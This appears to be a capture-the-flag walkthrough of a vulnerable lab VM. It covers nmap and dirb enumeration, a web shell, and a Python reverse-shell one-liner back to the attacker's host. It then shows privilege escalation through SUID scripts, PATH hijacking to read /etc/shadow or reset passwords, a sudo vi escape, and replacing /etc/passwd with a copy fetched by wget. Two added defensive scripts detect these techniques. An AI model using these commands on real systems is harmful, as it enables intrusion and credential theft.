Enumeration
nmap
nmap -sC -sV -oA nmap/EsLinux 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-20 06:58 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42718/udp6 mountd
| 100005 1,2,3 51050/udp mountd
| 100005 1,2,3 53745/tcp6 mountd
| 100005 1,2,3 59791/tcp mountd
| 100021 1,3,4 33361/tcp6 nlockmgr
| 100021 1,3,4 38815/tcp nlockmgr
| 100021 1,3,4 43707/udp nlockmgr
| 100021 1,3,4 57591/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
MAC Address: 00:0C:29:2C:24:CB (VMware)
Service Info: Host: LINUX
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: osboxes
| NetBIOS computer name: LINUX\x00
| Domain name: \x00
| FQDN: osboxes
|_ System time: 2020-05-20T06:58:42-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-20T10:58:42
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.82 seconds
dirb
dirb http://192.168.1.114/ -X .php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu May 21 23:26:47 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/shell.php (CODE:200|SIZE:29)
-----------------
END_TIME: Thu May 21 23:26:52 2020
DOWNLOADED: 4612 - FOUND: 1
We can see shell.php here, so let's open it in the browser.
Passing a command in the cmd parameter returns that command's output.
Reverse shell
We then set up a listener on our machine on port 4444.
From the web shell, we can use python to get a reverse shell back to it:
192.168.1.114/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once we get a shell, upgrade it to a proper TTY by typing
python -c 'import pty; pty.spawn("/bin/bash")'
Then we can start to perform Privilege Escalation.
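As an added example that is not part of the original writeup, the script below is what a defender could run over this host's Apache access log to spot the shell.php?cmd= requests used above. The log lines inside it are constructed (192.168.1.120 is a made-up second client); only the shell.php path and the 192.168.1.113 address come from the page, and the function names are my own.

```shell
#!/bin/sh
# Added detection helper, not from the original writeup: scan an Apache
# access log for requests that pass a command in a "cmd" query parameter,
# the way the shell.php page above is driven. The log lines are constructed.

SAMPLE_LOG='192.168.1.113 - - [20/May/2020:07:01:10 -0400] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
192.168.1.113 - - [20/May/2020:07:02:31 -0400] "GET /shell.php?cmd=id HTTP/1.1" 200 29 "-" "Mozilla/5.0"
192.168.1.113 - - [20/May/2020:07:03:05 -0400] "GET /shell.php?cmd=python%20-c%20%27import%20socket HTTP/1.1" 200 29 "-" "Mozilla/5.0"
192.168.1.120 - - [20/May/2020:07:04:00 -0400] "GET /search.php?q=cmd HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# Print "client<TAB>path<TAB>cmd value" for each request whose query string
# carries a cmd= parameter. In the combined log format the request target is
# field 7; a value that merely contains the word (q=cmd) is not reported.
cmd_param_requests() {
    awk '{
        split($7, parts, "?"); path = parts[1]; query = parts[2]
        n = split(query, kv, "&")
        for (i = 1; i <= n; i++)
            if (kv[i] ~ /^cmd=/) print $1 "\t" path "\t" substr(kv[i], 5)
    }' "$1"
}

# Number of distinct client addresses that sent cmd= requests.
cmd_param_clients() {
    cmd_param_requests "$1" | cut -f1 | sort -u | wc -l | tr -d ' '
}

# Run the scan over the constructed sample log.
demo() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$f"
    cmd_param_requests "$f"
    printf 'distinct clients: %s\n' "$(cmd_param_clients "$f")"
    rm -f "$f"
}
```

Call demo to run it against the sample, or point cmd_param_requests at a real access log.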
Privilege Escalation
Method 1
We can escalate privileges by exploiting the SUID bit set on some executable files.
Type
find / -perm -u=s -type f 2>/dev/null
We can see there are 2 SUID script files. We first go to the user3 directory.
We can see a script file there that any user can run to get root. Type ./shell
Got root! Easy!
Method 2
We can get a root shell by cracking the root password.
Navigate to the user5 directory, where we find the script file. Running it returns a directory listing, which indicates it runs the ls command (and looks it up through PATH rather than by absolute path).
Navigate to /tmp
Then type
echo "cat /etc/shadow" > ls
chmod 777 ls
export PATH=/tmp:$PATH
Run the script, then we will get this
Copy the hash to a file and crack it with john.
We can see that the root password is 12345.
su into root and you will get root lmao.
Method 3
We know that the user5 script executes as root, so we can use echo and chpasswd to replace an existing user's password.
To do that, navigate back to /tmp and type
echo 'echo "user1:12345" | chpasswd' > ls
, then chmod 777 ls
and export the PATH like we did just now.
Then go back to user5 and run the script. Now we can su to user1 and type the password we just set, which is 12345.
Now that we are in user1, type sudo -l
We can see it has sudo rights to run anything, so we can go ahead and type sudo su
to get
Method 4
Method 5
Using the PATH variable trick from method 3, we can do the same for user8.
After that, log in to user8 and type sudo -l
As we can see, vi has sudo rights:
sudo vi -c ':!/bin/sh' /dev/null
Then we will get root!
Method 6
If we type cat /etc/passwd we get this, and we can see that user7's GID has root access.
We can use the same PATH variable trick on user7.
We first copy the whole passwd file to our machine and then add a set of credentials.
But first we need to create a password hash for our new user; type
openssl passwd -1 -salt <salt> <password>
For example
openssl passwd -1 -salt wow damn
After that, on our machine, we add the credentials like this.
Then create a SimpleHTTPServer using python by typing
python -m SimpleHTTPServer
At the target machine, navigate to the /etc directory and type
wget -O passwd 192.168.1.113:8000/passwd
Once the transfer succeeds, we can su to the newly created user and type in the password we created.
Got root!
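The audit script below is an added example, not code from the original writeup. It checks for the conditions Methods 3, 5 and 6 rely on: a world-writable directory on PATH, a sudo rule that grants ALL or vi, and a non-root account whose UID or GID is 0. The passwd and sudoers samples inside it are constructed, and the function names are my own.

```shell
#!/bin/sh
# Added audit helpers, not from the original writeup. They look for the three
# conditions Methods 3, 5 and 6 depend on: a world-writable directory on PATH,
# sudo rules that grant ALL or an editor that can spawn a shell, and accounts
# other than root whose UID or GID is 0. Each helper takes a file or string
# argument so it can run against copies collected from a host; the sample
# data below is constructed.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
user1:x:1001:1001::/home/user1:/bin/bash
user7:x:1007:0::/home/user7:/bin/bash'

SAMPLE_SUDOERS='# comment mentioning ALL
Defaults env_reset
user1 ALL=(ALL) ALL
user8 ALL=(root) /usr/bin/vi
user2 ALL=(root) /usr/bin/id'

# Accounts other than root with UID 0 or GID 0, printed as name:uid:gid.
root_equivalent_accounts() {
    awk -F: '$1 != "root" && ($3 == 0 || $4 == 0) { print $1 ":" $3 ":" $4 }' "$1"
}

# Directories in a PATH-style string whose mode bits let anyone write there.
# The "other" write bit is the ninth character of the ls -ld mode string.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while read -r d; do
        [ -d "$d" ] || continue
        case "$(ls -ld "$d")" in d???????w*) printf '%s\n' "$d" ;; esac
    done
}

# Rule lines (comments skipped) that grant ALL or vi/vim, either of which
# lets the user run arbitrary commands as root.
risky_sudo_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep '=' |
        grep -E '[[:space:]](ALL|/usr/bin/vi|/usr/bin/vim)([[:space:],]|$)'
}

# Run all three checks over the constructed samples and the current PATH.
demo() {
    p=$(mktemp); s=$(mktemp)
    printf '%s\n' "$SAMPLE_PASSWD" > "$p"
    printf '%s\n' "$SAMPLE_SUDOERS" > "$s"
    echo "root-equivalent accounts:"; root_equivalent_accounts "$p"
    echo "risky sudo rules:"; risky_sudo_rules "$s"
    echo "world-writable PATH entries:"; writable_path_dirs "$PATH"
    rm -f "$p" "$s"
}
```

Point root_equivalent_accounts and risky_sudo_rules at a host's real /etc/passwd and /etc/sudoers to audit it; any hit is a finding to fix.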